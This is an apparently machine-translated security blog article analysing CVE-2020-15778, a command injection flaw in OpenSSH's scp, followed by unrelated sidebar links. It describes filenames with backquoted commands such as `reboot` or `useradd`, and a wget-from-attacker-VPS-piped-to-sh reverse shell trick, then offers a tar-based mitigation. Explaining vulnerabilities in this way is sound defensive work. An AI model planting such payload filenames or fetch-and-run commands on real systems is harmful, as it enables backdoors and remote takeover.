current position：Home>Cve-2020-15778 SSH vulnerability recurrence analysis
Cve-2020-15778 SSH vulnerability recurrence analysis
2022-05-15 07:51:53【Irteam - Industrial Safety】
In many industrial routers and some controllers , Adopted OpenSSH To do external connection and management .2020 year 7 month 9 By foreign security researchers ChinmayPandya Find out OpenSSH 8.3 p1 And before SCP There is a command injection vulnerability in the command .
For the above https://github.com/openssh/openssh-portable/blob/master/scp.c Code for ,989 Line is where the vulnerability is triggered . When copying files to a remote server , The file path is attached locally scp At the end of the order . for example , If you execute the following command ：
scp [email protected]:directory/TargetFile
It will execute a local command ：
When creating a local scp On command , It doesn't clean up file names . An attacker can use backquotes (`) File is injected as a command . and linux The system can accept backquotes (`) Name the file . If you try to payload Put it in back quotation marks as the file name , When calling scp Command will trigger the execution of this instruction .
Exploit scenarios ：
Attackers can use U The disk is disguised as device firmware or some kind of tool , stay U Create a deep subdirectory , A file in a directory can be named `payload`, such as `reboot`. When the victim copies U Disk directories and files are used scp -r \ Folder RemoteIP:\ Folder When you give this order , Will trigger the victim's machine to restart , Similarly, if you use backquotes +useradd Such a filename , You can open the back door directly on the victim's machine . Of course, the sick red team uses , Is in the VPS Upper assumption FTP Put rebound shell Script , Then use backquotes (`) combination wget http:// vps:port/xxx.sh | sh ./xxx.sh As the file name , Trigger the victim to rebound shell To VPS On .
For the execution of remote commands , Still need bypass authorized_keys, So the remote is less likely to be used . The following section PoC video , Just to show you , It is possible to execute commands remotely , But the premise is bypass authorized_keys otherwise , You still need to know
password Of .
Protection solutions ：
Up to now openssh Of github Didn't fix this loophole , Ban scp -r Overall directory copy method , use tar After compressing the directory into a single file ,scp After uploading to the remote machine , Again ssh Extract the directory from the remote machine .
Reference resources ：https://github.com/cpandya2909/CVE-2020-15778
author[Irteam - Industrial Safety],Please bring the original link to reprint, thank you.
The sidebar is recommended
- Which securities company does qiniu school recommend? Is it safe to open an account
- Hyperstyle: complete face inversion using hypernetwork
- What activities are supported by the metauniverse to access reality at this stage?
- P2P swap OTC trading on qredo
- Google | coca: the contrast caption generator is the basic image text model
- SIGIR 2022 | Huawei reloop: self correcting training recommendation system
- Whether you want "melon seed face" or "national character face", the "face changing" technology of Zhejiang University video can be done with one click!
- Sorting of naacl2022 prompt related papers
- Servlet create project
- "Chinese version" Musk was overturned by the original: "if it's true, I want to see him"
guess what you like
[network security] web security trends and core defense mechanisms
[intensive reading] object detection series (10) FPN: introducing multi-scale with feature pyramid
007. ISCSI server chap bidirectional authentication configuration
plot_ Importance multi classification, sorting mismatch, image value not displayed
[intensive reading] object detection series (XI) retinanet: the pinnacle of one stage detector
How to install MFS environment for ECS
[intensive reading] the beginning of object detection series (XII) cornernet: anchor free
Open source sharing -- a record of students passing through time
MOT：A Higher Order Metric for Evaluating Multi-object Tracking
- How to develop a distributed memory database (1)
- Reverse engineers reverse restore app and code, and localization is like this
- One line command teaches you how to export all the libraries in anaconda
- Bi tools are relatively big. Let's see which one is most suitable for you
- Read the history of database development
- Self cultivation of coder - batterymanager design
- Technology application of swift phantom type phantom in Apple source code learning
- Swiftui advanced skills: what is the use of the technology of swift phantom type phantom
- Swiftui advanced animation Encyclopedia of complex deformation animation is based on accelerate and vector arithmetic (tutorial includes source code)
- What problems remain unsolved in swiftui in 2022
- I'll set the route for fluent
- Flutter drawing process analysis and code practice
- Emoji language commonly used icon collection (interesting Emoji)
- 5.14 comprehensive case 2.0 - automatic induction door
- How to deploy redis service on k8s top?
- Importance of data warehouse specification
- Idea automatically generates serialization ID
- Why is it recommended not to use select * in MySQL?
- Let's talk about why redis needs to store two data structures for the same data type?
- Domain lateral move RDP delivery
- [learn slam orb_slam2 or slam3 from scratch] summary of all blog articles
- 20000 + star ultra lightweight OCR system pp-ocrv3 effect increased by 5% - 11%!
- A configurable canvas clock - Super multi style
- The pp-ocrv3 effect of 20000 + star ultra lightweight OCR system is further improved by 5% - 11%
- MySQL's golden rule: "don't use select *"
- True interview question: why does redis store a data type twice?
- High threshold for large factories? Five exclusive PDFs inside Alibaba will take you forward and win the offer
- Is it really hard to find a job? How on earth can I find a job with high salary without worrying about being laid off
- How to design knowledge center? (code attached)
- OWASP top 10 vulnerability analysis
- Are you still writing comment templates manually? Idea can generate annotation templates of classes and methods with one click. Click in if you don't know
- Numpy core syntax and code sorting summary!
- Can you believe that the swoole timer can realize millisecond task scheduling?
- Detailed explanation of art template engine
- Telephone subsystem of openharmony source code analysis -- call flow
- Yixin Huachen: how to do a good job in digital transformation in the power industry?
- One stop collaboration is really delicious - apipost
- Notes on modern algebra and series of questions: Chapter 1 (introduction of algebraic system)
- Notes on modern algebra and serialization of question types: Chapter 2 (properties of binary operation)